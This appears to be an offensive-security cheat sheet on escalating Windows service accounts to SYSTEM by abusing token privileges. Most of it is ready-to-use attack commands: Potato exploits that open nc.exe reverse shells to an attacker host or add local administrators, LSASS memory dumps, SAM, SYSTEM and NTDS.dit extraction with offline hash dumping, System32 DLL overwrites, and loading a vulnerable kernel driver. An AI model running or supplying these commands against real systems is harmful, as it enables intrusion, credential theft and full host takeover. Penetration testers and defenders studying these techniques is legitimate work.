Token & Potato Attacks
Abuse Windows token privileges to escalate from service accounts (IIS, MSSQL, etc.) to SYSTEM. If you have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, you're one potato away from SYSTEM.
Sections Token & Potato Attacks
Privilege Check
First, check if you have exploitable token privileges.
PS C:\> whoami /privKey privileges to look for:
| Privilege | What It Enables |
|---|---|
SeImpersonatePrivilege |
Potato attacks (SYSTEM via token impersonation) |
SeAssignPrimaryTokenPrivilege |
Potato attacks (assign tokens to new processes) |
SeDebugPrivilege |
Inject into SYSTEM processes, dump LSASS |
SeBackupPrivilege |
Read any file (including SAM, SYSTEM hives) |
SeRestorePrivilege |
Write any file (DLL hijacking into protected dirs) |
SeTakeOwnershipPrivilege |
Take ownership of any object (files, registry keys) |
SeLoadDriverPrivilege |
Load a kernel driver (kernel-level code execution) |
SeManageVolumePrivilege |
Read any file via raw disk access |
SeImpersonatePrivilege is the most common one you’ll see. IIS application pool accounts, MSSQL service accounts, and any service running as NT AUTHORITY\LOCAL SERVICE or NETWORK SERVICE typically have it.Potato Attacks
All potato attacks exploit the same core concept: trick a SYSTEM-level process into authenticating to your listener, then impersonate the resulting token. The variants differ in which coercion mechanism they use.
GodPotato
Works on Windows Server 2012 through Server 2022 and Windows 8 through Windows 11. Uses DCOM/RPCSS to get a SYSTEM token. [Requires SeImpersonatePrivilege]
PS C:\> .\GodPotato.exe -cmd "cmd /c whoami"Reverse shell.
PS C:\> .\GodPotato.exe -cmd "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"Add local admin.
PS C:\> .\GodPotato.exe -cmd "cmd /c net localgroup Administrators <USER> /add"SweetPotato
Combines multiple potato techniques (EfsPotato, PrintSpoofer, and more). Automatically selects the best method. [Requires SeImpersonatePrivilege]
PS C:\> .\SweetPotato.exe -e EfsRpc -p C:\Temp\nc.exe -a "<LHOST> <LPORT> -e cmd.exe"PS C:\> .\SweetPotato.exe -e EfsRpc -p cmd.exe -a "/c net localgroup Administrators <USER> /add"JuicyPotatoNG
Updated version of JuicyPotato. Abuses DCOM to get a SYSTEM token. Works on modern Windows. [Requires SeImpersonatePrivilege]
PS C:\> .\JuicyPotatoNG.exe -t * -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"PS C:\> .\JuicyPotatoNG.exe -t * -p cmd.exe -a "/c net localgroup Administrators <USER> /add"PrintSpoofer
Abuses the Print Spooler service to capture a SYSTEM token via named pipes. [Requires SeImpersonatePrivilege]
PS C:\> .\PrintSpoofer64.exe -i -c cmdPS C:\> .\PrintSpoofer64.exe -c "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"sc query spooler.RoguePotato
Uses a remote OXID resolver to bypass protections added after the original JuicyPotato was patched. [Requires SeImpersonatePrivilege]
Requires a listener on a machine you control (port 135).
# On attacker: redirect port 135 to the target
PS C:\> socat tcp-listen:135,reuseaddr,fork tcp:<TARGET>:9999PS C:\> .\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -l 9999JuicyPotato (Legacy)
Original potato for older systems (Windows Server 2008/2012/2016, Windows 7/8/10 before 1809). [Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege]
PS C:\> .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -t *With a specific CLSID (needed for some OS versions).
PS C:\> .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}Potato Selection Guide
| Potato | Best For | Notes |
|---|---|---|
| GodPotato | First choice on any modern system | Most reliable, broadest compatibility |
| SweetPotato | Fallback (tries multiple methods) | Auto-selects the best technique |
| JuicyPotatoNG | Modern Windows | Updated JuicyPotato |
| PrintSpoofer | When Spooler is running | Simple and reliable |
| RoguePotato | When others fail | Requires external listener |
| JuicyPotato | Legacy systems (pre-2019) | Needs working CLSID |
SeDebugPrivilege Abuse
Allows you to open any process (including SYSTEM processes) with full access. [Requires SeDebugPrivilege]
Migrate into a SYSTEM Process
Via Meterpreter.
# Find a SYSTEM process (e.g., winlogon.exe, lsass.exe)
msf> migrate <PID>
msf> getuid # Should be NT AUTHORITY\SYSTEMDump LSASS
# Create a minidump of LSASS
PS C:\> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp fullThen extract offline with Mimikatz or pypykatz.
PS C:\> pypykatz lsa minidump lsass.dmpInject into SYSTEM Process
Using a tool like psgetsystem.
PS C:\> .\PsGetsystem.ps1
PS C:\> [MyProcess]::CreateProcessFromParent((Get-Process winlogon).Id, "cmd.exe", "")SeBackupPrivilege Abuse
Allows reading any file on the system, bypassing ACLs. [Requires SeBackupPrivilege]
Extract SAM and SYSTEM Hives
PS C:\> reg save HKLM\SAM C:\Temp\SAM
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEMExtract hashes offline.
PS C:\> impacket-secretsdump -sam SAM -system SYSTEM LOCALCopy Protected Files
Use robocopy with backup mode.
PS C:\> robocopy /b "C:\Users\Administrator\Desktop" "C:\Temp\loot" secret.txtOr use a diskshadow + robocopy workflow to copy the NTDS.dit from a DC.
# Create diskshadow script
PS C:\> echo "set context persistent nowriters" > script.txt
PS C:\> echo "add volume c: alias myalias" >> script.txt
PS C:\> echo "create" >> script.txt
PS C:\> echo "expose %myalias% z:" >> script.txt
PS C:\> diskshadow /s script.txt
PS C:\> robocopy /b z:\Windows\NTDS C:\Temp NTDS.dit
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEMPS C:\> impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCALSeRestorePrivilege Abuse
Allows writing any file on the system. [Requires SeRestorePrivilege]
Replace a DLL or binary in a protected directory for DLL hijacking or service binary replacement.
# Enable the privilege
PS C:\> Import-Module .\EnableSeRestorePrivilege.ps1
# Overwrite a protected file
PS C:\> copy payload.dll "C:\Windows\System32\target.dll"SeTakeOwnershipPrivilege Abuse
Take ownership of any file or registry key, then grant yourself full access. [Requires SeTakeOwnershipPrivilege]
# Take ownership of a file
PS C:\> takeown /f "C:\Path\To\Protected\file.exe"
# Grant yourself full control
PS C:\> icacls "C:\Path\To\Protected\file.exe" /grant <USER>:F
# Now you can read/modify/replace itOn a registry key.
# Take ownership
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\<SERVICE_NAME>", [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree, [System.Security.AccessControl.RegistryRights]::TakeOwnership)
$acl = $key.GetAccessControl()
$acl.SetOwner([System.Security.Principal.NTAccount]"$env:USERNAME")
$key.SetAccessControl($acl)SeLoadDriverPrivilege Abuse
Load a vulnerable kernel driver, then exploit it for kernel-level code execution. [Requires SeLoadDriverPrivilege]
Classic technique using the Capcom.sys driver.
# Load the vulnerable driver
PS C:\> .\EoPLoadDriver.exe System\CurrentControlSet\MyDriver C:\Temp\Capcom.sys
PS C:\> # Exploit the driver for SYSTEM shell
PS C:\> .\ExploitCapcom.exeSeManageVolumePrivilege Abuse
Grants raw read access to any disk volume. [Requires SeManageVolumePrivilege]
# Use the privilege to read the raw disk and extract files
# Tools like SeManageVolumeExploit can abuse this
PS C:\> .\SeManageVolumeExploit.exeToken Impersonation (Meterpreter)
If you have a Meterpreter session with impersonation privileges.
msf> load incognito
msf> list_tokens -u
msf> impersonate_token "NT AUTHORITY\SYSTEM"
msf> getuidList available delegation tokens.
PS C:\> list_tokens -u